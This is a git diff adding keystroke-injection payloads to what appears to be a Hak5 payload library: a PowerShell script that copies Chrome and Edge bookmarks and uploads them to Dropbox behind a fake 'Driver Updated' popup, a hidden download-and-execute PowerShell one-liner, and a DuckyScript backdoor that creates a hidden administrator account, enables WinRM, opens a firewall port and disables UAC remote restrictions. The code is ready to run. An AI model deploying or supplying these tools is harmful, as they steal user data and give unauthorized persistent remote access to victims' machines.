Merge branch 'hak5:master' into master

payloads/library/exfiltration/Bookmark-Hog/BH.ps1

@@ -0,0 +1,63 @@
+#Bookmark-Hog
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+     try {
+         Write-Host "The chrome bookmark file has not been found. "
+     }
+     catch {
+         throw $_.Exception.Message
+     }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+  else {
+     $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
+     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" 
+ }
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+    try {
+        Write-Host "The edge bookmark file has not been found. "
+    }
+    catch {
+        throw $_.Exception.Message
+    }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+    $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
+    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" 
+}
+
+function DropBox-Upload {
+
+    [CmdletBinding()]
+    param (
+        
+    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+    [Alias("f")]
+    [string]$SourceFilePath
+    ) 
+    $DropBoxAccessToken = "YOUR ACCESS TOKEN"   # Replace with your DropBox Access Token
+    $outputFile = Split-Path $SourceFilePath -leaf
+    $TargetFilePath="/$outputFile"
+    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+    $authorization = "Bearer " + $DropBoxAccessToken
+    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+    $headers.Add("Authorization", $authorization)
+    $headers.Add("Dropbox-API-Arg", $arg)
+    $headers.Add("Content-Type", 'application/octet-stream')
+    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+    }
+
+DropBox-Upload -f "$env:tmp/$F1"
+DropBox-Upload -f "$env:tmp/$F2"
+
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

payloads/library/exfiltration/Bookmark-Hog/README.md

@@ -0,0 +1,109 @@
+<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Bookmark-Hog
+
+A payload to exfiltrate bookmarks of the 2 most popular browsers
+
+## Description
+
+This payload will enumerate through the browser directories, looking for the file that stores the bookmark history 
+These files will be saved to the temp directory
+Finally dropbox will be used to exfiltrate the files to cloud storage
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

payloads/library/exfiltration/Bookmark-Hog/payload.txt

@@ -0,0 +1,16 @@
+REM     Title: Bookmark-Hog
+
+REM     Author: atomiczsec
+
+REM     Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
+
+REM     Target: Windows 10, 11
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM     Remember to replace the link with your DropBox shared link for the intended file to download
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

payloads/library/remote_access/win_winrm-backdoor/README.md

@@ -0,0 +1,28 @@
+# "Microsoft Windows" WinRM Backdoor
+
+- Title:         "Microsoft Windows" WinRM Backdoor
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Remote Access
+
+## Description
+
+1) Adds a user account (OMG_User:OMG_P@ssW0rD).
+2) Adds this local user to local administrator group.
+3) Enables "Windows Remote Management" with default settings.
+4) Adds a rule to the firewall.
+5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
+6) Hides this user account.
+
+## Exploitation
+
+>
+> The connection identifiers will be those defined by the values : **OMG_User** and **OMG_P@ssW0rD**.
+>
+
+```
+hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user OMG_User --password 'OMG_P@ssW0rD'
+*Evil-WinRM* PS C:\Users\OMG_User\Documents> whoami
+desktop-xxxxxxx\omg_user
+```

payloads/library/remote_access/win_winrm-backdoor/payload.txt

@@ -0,0 +1,83 @@
+REM #
+REM # Title:            "Microsoft Windows" WinRM Backdoor
+REM #
+REM # Description:      
+REM #                   1) Adds a user account (OMG_User:OMG_P@ssW0rD).
+REM #                   2) Adds this local user to local administrator group.
+REM #                   3) Enables "Windows Remote Management" with default settings.
+REM #                   4) Adds a rule to the firewall.
+REM #                   5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
+REM #                   6) Hides this user account.
+REM #
+REM # Author:           TW-D
+REM # Version:          1.0
+REM # Category:         Remote Access
+REM # Target:           Microsoft Windows
+REM #
+REM # TESTED ON
+REM # ===============
+REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+REM #
+REM # REQUIREMENTS
+REM # ===============
+REM # The target user must belong to the 'Administrators' group.
+REM #
+
+REM ######## INITIALIZATION ########
+
+DELAY 1000
+DUCKY_LANG US
+DELAY 1000
+
+REM ######## STAGE1 ########
+
+GUI r
+DELAY 3000
+STRING cmd
+DELAY 1000
+CTRL SHIFT ENTER
+DELAY 3000
+LEFTARROW
+DELAY 5000
+ENTER
+DELAY 5000
+
+REM ######## STAGE2 ########
+
+STRING NET USER OMG_User OMG_P@ssW0rD /ADD
+ENTER
+DELAY 1500
+
+STRING NET LOCALGROUP Administrators OMG_User /ADD
+ENTER
+DELAY 1500
+
+REM ######## STAGE3 ########
+
+STRING WINRM QUICKCONFIG
+ENTER
+DELAY 3000
+
+STRING y
+ENTER
+DELAY 1500
+
+STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
+ENTER
+DELAY 1500
+
+REM ######## STAGE4 ########
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
+ENTER
+DELAY 1500
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0
+ENTER
+DELAY 1500
+
+REM ######## FINISH ########
+
+STRING EXIT
+ENTER